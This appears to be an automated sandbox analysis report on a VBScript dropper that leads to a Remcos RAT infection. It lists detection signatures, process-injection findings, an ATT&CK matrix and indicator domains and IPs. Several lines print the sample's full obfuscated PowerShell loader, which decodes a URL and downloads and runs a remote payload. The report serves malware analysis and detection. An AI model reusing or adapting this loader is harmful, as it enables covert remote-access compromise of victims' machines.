              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4992Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4889Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6827Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2984Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1028Thread sleep time: -3689348814741908s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7564Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 7920Thread sleep count: 1877 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 7920Thread sleep time: -5631000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 7920Thread sleep count: 8114 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 7920Thread sleep time: -24342000s >= -30000sJump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: msiexec.exe, 0000000D.00000002.2546894323.00000000069E9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: powershell.exe, 00000002.00000002.1393678226.000002916ABC8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWt %SystemRoot%\system32\mswsock.dllE CulRT,laeMillkDiscsIndst BssrUltiEGinnmSmalI,orvtRecae .ilTBesvELiniN');Nonprecipitation225 ($fike);Nonprecipitation225 (Exposes ' F r$R.ilT,eskv Arti RossSp ntO eredonopinf,uAe.enSta kHiggtSliseLoyktImmusBatz. hawHBargeBefr(
              Source: msiexec.exe, 0000000D.00000002.2546894323.000000000698A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH
              Source: msiexec.exe, 0000000D.00000002.2546894323.00000000069E9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWo
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Early bird code injection technique detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
              Yara detected Powershell download and execute
              Source: Yara matchFile source: amsi64_2356.amsi.csv, type: OTHER
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2356, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7452, type: MEMORYSTR
              Queues an APC in another process (thread injection)
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
              Writes to foreign memory regions
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 3A80000Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Ndhjlps='Kontinentalsokkel';;$Klauber101='Catadioptrical';;$Marksmen='Kalfaktorens';;$Unlivableness='Limewort';;$Proctoplastic=$host.Name; function Exposes($Kataloger){If ($Proctoplastic) {$Cognacagtigeres='Corollaceous';$Unintelligently103=4;$credoerne=$Unintelligently103}do{$Defeats+=$Kataloger[$credoerne];$credoerne+=5} until(!$Kataloger[$credoerne])$Defeats}function Nonprecipitation225($Civvy){ .($hesperornithid) ($Civvy)}$Underekstremiteten=Exposes 'Le.iNKompESubtt C.e.Depow';$Underekstremiteten+=Exposes 'broneAn eb s mCUntolWaleiSidsefotoNOv rT';$Chemotherapy=Exposes 'NondMTresoEarlzOocyi indlFriglT etakom /';$Valsk=Exposes ' PreTEme lStubsTrag1 tim2';$Gevandterne='E fa[ HulnBraiE G dT V b.DilaSS ereEndarUnruv .reIbeboC fsaETermPSygeO BroiPiroNDuodtBareM CocAWr tN ,ona M.lGAlabea terHols]Augm:Aftv:RigssDekaEN ffCUltrU,tomROut i SmytD ngyMercPDomerU.efOAtriTf,glORaadcNe,roBeyol Fej=Batt$ flav TotARan LSvrls,jreK';$Chemotherapy+=Exposes 'Ca o5 A,b.Sk b0 Xen I,te(DingWelskiRequnDrifdudmaoTmniwGrnssO,by ,oflNBur.TZone Camo1Spur0R ln.Groi0.nth;Sfi actoWBu diHaywnF,rv6G,ni4Skat; G,e ParaxGudf6K.us4A st; opr dionrMic vOmt :F,id1Stor3Nykk1Reca.,prn0Dela) Cen OutG Ap eSrskcDotik NicoA,ou/Ball2Brag0 For1 Leu0Tims0Band1 Sy 0Mamm1Cond PsaFDyreiAndrrEnsleHincfSan o bemxAnal/Myos1Soci3Kalo1Bavl.Derm0';$Erhvervssygdommene=Exposes 'MargUA foSTumieImpornani- DogAImplGFluoE KolnPu.pt';$Ridableness=Exposes 'Miljh Shit nultRubbp vasergs:L.dg/Voci/OutroCutlfWall1Hgt xRedi.CafiiRepocglobuf,ng/Ydrert lbx SerHB llERo kjLin EAn kYPimpEUnde/ChifNDepri D.kc entkUnive Gy.lKri i OveztermaLykktIndbiFusioEtikn Lep.K.nfcKrels No.v';$Samariteruddannelse=Exposes 'Nids>';$hesperornithid=Exposes ' ineIStrue oncx';$Arbejdstilbud216='Delelejligheds';$Stenvindenes49='\huguenotism.Bed';Nonprecipitation225 (Exposes ' Sac$BikagBondlThe O,onoB mpea belLupsl:IleomThomoletmDSubfEev lNFunkHArkie nrDI peESeksROrd NBolseUmedST,as= Kl.$ InkerefrnDeutvd hy:lollATa nP utPl ddDAdelaFod Tb tuaP,ja+Plag$mokeSAdretPr aEnvernHoveVInfri SanNChacdKroeE CooN KameNon Sconc4 Cap9');Nonprecipitation225 (Exposes 'Non $ TecGRentlKuldonondBBe aaFiskL Und:Ko,en oesa.orhRFi ucSmudODepaS HydIM loSIlio=Hove$CrosR opnISupeDTilsaTereB NonlIde e M snForseKanaSInkusTra .dic,sbolip nefLHemaIRifft Ou ( V r$FaldS Coha VarmPrivaOutwrAnneiSto T Apteh,emrmoruUCystD ildBilbA MonNTinsNK.atELoseLMed sClime Rip)');Nonprecipitation225 (Exposes $Gevandterne);$Ridableness=$Narcosis[0];$fike=(Exposes ' Hom$GangGDiscLGensoS ngB MagAEth l.ord:StroTPerivraadINovis Fort.ikrERoerPDipoUDavinIrreKCaritBambE,pitTUng sAden=Encyn ChaEafbeWSkaa-DrifO manBSub.jBredEBaylCK,tttnone TessByggyR glsChaut LeveFdsemSoci.Real$ForsUTidsnInd DVlteE CulRT,laeMillkDiscsIndst BssrUltiEGinnmSmalI,orvtRecae .ilTBesvELiniN');Nonprecipitation225 ($fike);Nonprecipitation225 (Exposes ' F r$R.ilT,eskv Arti RossSp ntO eredonopinf,uJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" ";$ndhjlps='kontinentalsokkel';;$klauber101='catadioptrical';;$marksmen='kalfaktorens';;$unlivableness='limewort';;$proctoplastic=$host.name; function exposes($kataloger){if ($proctoplastic) {$cognacagtigeres='corollaceous';$unintelligently103=4;$credoerne=$unintelligently103}do{$defeats+=$kataloger[$credoerne];$credoerne+=5} until(!$kataloger[$credoerne])$defeats}function nonprecipitation225($civvy){ .($hesperornithid) ($civvy)}$underekstremiteten=exposes 'le.inkompesubtt c.e.depow';$underekstremiteten+=exposes 'bronean eb s mcuntolwaleisidsefotonov rt';$chemotherapy=exposes 'nondmtresoearlzoocyi indlfriglt etakom /';$valsk=exposes ' preteme lstubstrag1 tim2';$gevandterne='e fa[ hulnbraie g dt v b.dilass ereendarunruv .reibeboc fsaetermpsygeo broipironduodtbarem cocawr tn ,ona m.lgalabea terhols]augm:aftv:rigssdekaen ffcultru,tomrout i smytd ngymercpdomeru.efoatritf,gloraadcne,robeyol fej=batt$ flav totaran lsvrls,jrek';$chemotherapy+=exposes 'ca o5 a,b.sk b0 xen i,te(dingwelskirequndrifdudmaotmniwgrnsso,by ,oflnbur.tzone camo1spur0r ln.groi0.nth;sfi actowbu dihaywnf,rv6g,ni4skat; g,e paraxgudf6k.us4a st; opr dionrmic vomt :f,id1stor3nykk1reca.,prn0dela) cen outg ap esrskcdotik nicoa,ou/ball2brag0 for1 leu0tims0band1 sy 0mamm1cond psafdyreiandrrenslehincfsan o bemxanal/myos1soci3kalo1bavl.derm0';$erhvervssygdommene=exposes 'margua fostumieimpornani- dogaimplgfluoe kolnpu.pt';$ridableness=exposes 'miljh shit nultrubbp vasergs:l.dg/voci/outrocutlfwall1hgt xredi.cafiirepocglobuf,ng/ydrert lbx serhb llero kjlin ean kypimpeunde/chifndepri d.kc entkunive gy.lkri i oveztermalykktindbifusioetikn lep.k.nfckrels no.v';$samariteruddannelse=exposes 'nids>';$hesperornithid=exposes ' ineistrue oncx';$arbejdstilbud216='delelejligheds';$stenvindenes49='\huguenotism.bed';nonprecipitation225 (exposes ' sac$bikagbondlthe o,onob mpea bellupsl:ileomthomoletmdsubfeev lnfunkharkie nrdi peeseksrord nbolseumedst,as= kl.$ inkerefrndeutvd hy:lollata np utpl dddadelafod tb tuap,ja+plag$mokesadretpr aenvernhovevinfri sannchacdkroee coon kamenon sconc4 cap9');nonprecipitation225 (exposes 'non $ tecgrentlkuldonondbbe aafiskl und:ko,en oesa.orhrfi ucsmudodepas hydim losilio=hove$crosr opnisupedtilsatereb nonlide e m snforsekanasinkustra .dic,sbolip neflhemairifft ou ( v r$falds coha varmprivaoutwranneisto t apteh,emrmoruucystd ildbilba monntinsnk.ateloselmed sclime rip)');nonprecipitation225 (exposes $gevandterne);$ridableness=$narcosis[0];$fike=(exposes ' hom$ganggdisclgensos ngb magaeth l.ord:strotperivraadinovis fort.ikreroerpdipoudavinirrekcaritbambe,pittung saden=encyn chaeafbewskaa-drifo manbsub.jbredebaylck,tttnone tessbyggyr glschaut levefdsemsoci.real$forsutidsnind dvltee culrt,laemillkdiscsindst bssrultieginnmsmali,orvtrecae .iltbesvelinin');nonprecipitation225 ($fike);nonprecipitation225 (exposes ' f r$r.ilt,eskv arti rosssp nto eredonopinf,u
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" ";$ndhjlps='kontinentalsokkel';;$klauber101='catadioptrical';;$marksmen='kalfaktorens';;$unlivableness='limewort';;$proctoplastic=$host.name; function exposes($kataloger){if ($proctoplastic) {$cognacagtigeres='corollaceous';$unintelligently103=4;$credoerne=$unintelligently103}do{$defeats+=$kataloger[$credoerne];$credoerne+=5} until(!$kataloger[$credoerne])$defeats}function nonprecipitation225($civvy){ .($hesperornithid) ($civvy)}$underekstremiteten=exposes 'le.inkompesubtt c.e.depow';$underekstremiteten+=exposes 'bronean eb s mcuntolwaleisidsefotonov rt';$chemotherapy=exposes 'nondmtresoearlzoocyi indlfriglt etakom /';$valsk=exposes ' preteme lstubstrag1 tim2';$gevandterne='e fa[ hulnbraie g dt v b.dilass ereendarunruv .reibeboc fsaetermpsygeo broipironduodtbarem cocawr tn ,ona m.lgalabea terhols]augm:aftv:rigssdekaen ffcultru,tomrout i smytd ngymercpdomeru.efoatritf,gloraadcne,robeyol fej=batt$ flav totaran lsvrls,jrek';$chemotherapy+=exposes 'ca o5 a,b.sk b0 xen i,te(dingwelskirequndrifdudmaotmniwgrnsso,by ,oflnbur.tzone camo1spur0r ln.groi0.nth;sfi actowbu dihaywnf,rv6g,ni4skat; g,e paraxgudf6k.us4a st; opr dionrmic vomt :f,id1stor3nykk1reca.,prn0dela) cen outg ap esrskcdotik nicoa,ou/ball2brag0 for1 leu0tims0band1 sy 0mamm1cond psafdyreiandrrenslehincfsan o bemxanal/myos1soci3kalo1bavl.derm0';$erhvervssygdommene=exposes 'margua fostumieimpornani- dogaimplgfluoe kolnpu.pt';$ridableness=exposes 'miljh shit nultrubbp vasergs:l.dg/voci/outrocutlfwall1hgt xredi.cafiirepocglobuf,ng/ydrert lbx serhb llero kjlin ean kypimpeunde/chifndepri d.kc entkunive gy.lkri i oveztermalykktindbifusioetikn lep.k.nfckrels no.v';$samariteruddannelse=exposes 'nids>';$hesperornithid=exposes ' ineistrue oncx';$arbejdstilbud216='delelejligheds';$stenvindenes49='\huguenotism.bed';nonprecipitation225 (exposes ' sac$bikagbondlthe o,onob mpea bellupsl:ileomthomoletmdsubfeev lnfunkharkie nrdi peeseksrord nbolseumedst,as= kl.$ inkerefrndeutvd hy:lollata np utpl dddadelafod tb tuap,ja+plag$mokesadretpr aenvernhovevinfri sannchacdkroee coon kamenon sconc4 cap9');nonprecipitation225 (exposes 'non $ tecgrentlkuldonondbbe aafiskl und:ko,en oesa.orhrfi ucsmudodepas hydim losilio=hove$crosr opnisupedtilsatereb nonlide e m snforsekanasinkustra .dic,sbolip neflhemairifft ou ( v r$falds coha varmprivaoutwranneisto t apteh,emrmoruucystd ildbilba monntinsnk.ateloselmed sclime rip)');nonprecipitation225 (exposes $gevandterne);$ridableness=$narcosis[0];$fike=(exposes ' hom$ganggdisclgensos ngb magaeth l.ord:strotperivraadinovis fort.ikreroerpdipoudavinirrekcaritbambe,pittung saden=encyn chaeafbewskaa-drifo manbsub.jbredebaylck,tttnone tessbyggyr glschaut levefdsemsoci.real$forsutidsnind dvltee culrt,laemillkdiscsindst bssrultieginnmsmali,orvtrecae .iltbesvelinin');nonprecipitation225 ($fike);nonprecipitation225 (exposes ' f r$r.ilt,eskv arti rosssp nto eredonopinf,u
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" ";$ndhjlps='kontinentalsokkel';;$klauber101='catadioptrical';;$marksmen='kalfaktorens';;$unlivableness='limewort';;$proctoplastic=$host.name; function exposes($kataloger){if ($proctoplastic) {$cognacagtigeres='corollaceous';$unintelligently103=4;$credoerne=$unintelligently103}do{$defeats+=$kataloger[$credoerne];$credoerne+=5} until(!$kataloger[$credoerne])$defeats}function nonprecipitation225($civvy){ .($hesperornithid) ($civvy)}$underekstremiteten=exposes 'le.inkompesubtt c.e.depow';$underekstremiteten+=exposes 'bronean eb s mcuntolwaleisidsefotonov rt';$chemotherapy=exposes 'nondmtresoearlzoocyi indlfriglt etakom /';$valsk=exposes ' preteme lstubstrag1 tim2';$gevandterne='e fa[ hulnbraie g dt v b.dilass ereendarunruv .reibeboc fsaetermpsygeo broipironduodtbarem cocawr tn ,ona m.lgalabea terhols]augm:aftv:rigssdekaen ffcultru,tomrout i smytd ngymercpdomeru.efoatritf,gloraadcne,robeyol fej=batt$ flav totaran lsvrls,jrek';$chemotherapy+=exposes 'ca o5 a,b.sk b0 xen i,te(dingwelskirequndrifdudmaotmniwgrnsso,by ,oflnbur.tzone camo1spur0r ln.groi0.nth;sfi actowbu dihaywnf,rv6g,ni4skat; g,e paraxgudf6k.us4a st; opr dionrmic vomt :f,id1stor3nykk1reca.,prn0dela) cen outg ap esrskcdotik nicoa,ou/ball2brag0 for1 leu0tims0band1 sy 0mamm1cond psafdyreiandrrenslehincfsan o bemxanal/myos1soci3kalo1bavl.derm0';$erhvervssygdommene=exposes 'margua fostumieimpornani- dogaimplgfluoe kolnpu.pt';$ridableness=exposes 'miljh shit nultrubbp vasergs:l.dg/voci/outrocutlfwall1hgt xredi.cafiirepocglobuf,ng/ydrert lbx serhb llero kjlin ean kypimpeunde/chifndepri d.kc entkunive gy.lkri i oveztermalykktindbifusioetikn lep.k.nfckrels no.v';$samariteruddannelse=exposes 'nids>';$hesperornithid=exposes ' ineistrue oncx';$arbejdstilbud216='delelejligheds';$stenvindenes49='\huguenotism.bed';nonprecipitation225 (exposes ' sac$bikagbondlthe o,onob mpea bellupsl:ileomthomoletmdsubfeev lnfunkharkie nrdi peeseksrord nbolseumedst,as= kl.$ inkerefrndeutvd hy:lollata np utpl dddadelafod tb tuap,ja+plag$mokesadretpr aenvernhovevinfri sannchacdkroee coon kamenon sconc4 cap9');nonprecipitation225 (exposes 'non $ tecgrentlkuldonondbbe aafiskl und:ko,en oesa.orhrfi ucsmudodepas hydim losilio=hove$crosr opnisupedtilsatereb nonlide e m snforsekanasinkustra .dic,sbolip neflhemairifft ou ( v r$falds coha varmprivaoutwranneisto t apteh,emrmoruucystd ildbilba monntinsnk.ateloselmed sclime rip)');nonprecipitation225 (exposes $gevandterne);$ridableness=$narcosis[0];$fike=(exposes ' hom$ganggdisclgensos ngb magaeth l.ord:strotperivraadinovis fort.ikreroerpdipoudavinirrekcaritbambe,pittung saden=encyn chaeafbewskaa-drifo manbsub.jbredebaylck,tttnone tessbyggyr glschaut levefdsemsoci.real$forsutidsnind dvltee culrt,laemillkdiscsindst bssrultieginnmsmali,orvtrecae .iltbesvelinin');nonprecipitation225 ($fike);nonprecipitation225 (exposes ' f r$r.ilt,eskv arti rosssp nto eredonopinf,uJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 0000000D.00000002.2546894323.00000000069CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.2546894323.00000000069FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 7768, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Detected Remcos RAT
              Source: C:\Windows\SysWOW64\msiexec.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-7K8JADJump to behavior
              Yara detected Remcos RAT
              Source: Yara matchFile source: 0000000D.00000002.2546894323.00000000069CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.2546894323.00000000069FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 7768, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information321
              Scripting              		Valid Accounts1
              Windows Management Instrumentation              		321
              Scripting              		311
              Process Injection              		1
              Masquerading              		OS Credential Dumping1
              Security Software Discovery              		Remote Services1
              Archive Collected Data              		11
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		21
              Virtualization/Sandbox Evasion              		LSASS Memory1
              Process Discovery              		Remote Desktop ProtocolData from Removable Media1
              Non-Standard Port              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Exploitation for Client Execution              		Logon Script (Windows)Logon Script (Windows)311
              Process Injection              		Security Account Manager21
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive1
              Remote Access Software              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts2
              PowerShell              		Login HookLogin Hook2
              Obfuscated Files or Information              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput Capture1
              Ingress Tool Transfer              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Software Packing              		LSA Secrets1
              File and Directory Discovery              		SSHKeylogging2
              Non-Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading              		Cached Domain Credentials13
              System Information Discovery              		VNCGUI Input Capture113
              Application Layer Protocol              		Data Transfer Size LimitsService Stop

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1573519 Sample: Strait STS.vbs Startdate: 12/12/2024 Architecture: WINDOWS Score: 100 23 of1x.icu 2->23 29 Suricata IDS alerts for network traffic 2->29 31 Found malware configuration 2->31 33 Malicious sample detected (through community Yara rule) 2->33 35 9 other signatures 2->35 8 wscript.exe 1 2->8         started        11 powershell.exe 18 2->11         started        signatures3 process4 signatures5 37 VBScript performs obfuscated calls to suspicious functions 8->37 39 Suspicious powershell command line found 8->39 41 Wscript starts Powershell (via cmd or directly) 8->41 51 2 other signatures 8->51 13 powershell.exe 14 18 8->13         started        43 Early bird code injection technique detected 11->43 45 Writes to foreign memory regions 11->45 47 Found suspicious powershell code related to unpacking or dynamic code loading 11->47 49 Queues an APC in another process (thread injection) 11->49 17 msiexec.exe 3 6 11->17         started        19 conhost.exe 11->19         started        process6 dnsIp7 25 of1x.icu 172.67.216.143, 443, 49699, 49776 CLOUDFLARENETUS United States 13->25 53 Found suspicious powershell code related to unpacking or dynamic code loading 13->53 21 conhost.exe 13->21         started        27 154.216.18.216, 2404, 49786, 49841 SKHT-ASShenzhenKatherineHengTechnologyInformationCo Seychelles 17->27 55 Detected Remcos RAT 17->55 signatures8 process9

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              Strait STS.vbs0%ReversingLabs

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              SourceDetectionScannerLabelLink
              of1x.icu1%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              https://of1x.icu/rxHEjEYE/Nickelization.csv2%VirustotalBrowse
              http://crl.microsk0%Avira URL Cloudsafe
              https://of1x.icu/0%Avira URL Cloudsafe
              https://of1x.icu/rxHEjEYE/Nickelization.csvP0%Avira URL Cloudsafe
              https://of1x.icu/rxHEjEYE/Nickelization.csv0%Avira URL Cloudsafe
              https://of1x.icu0%Avira URL Cloudsafe
              http://crl.microsoft.H0%Avira URL Cloudsafe
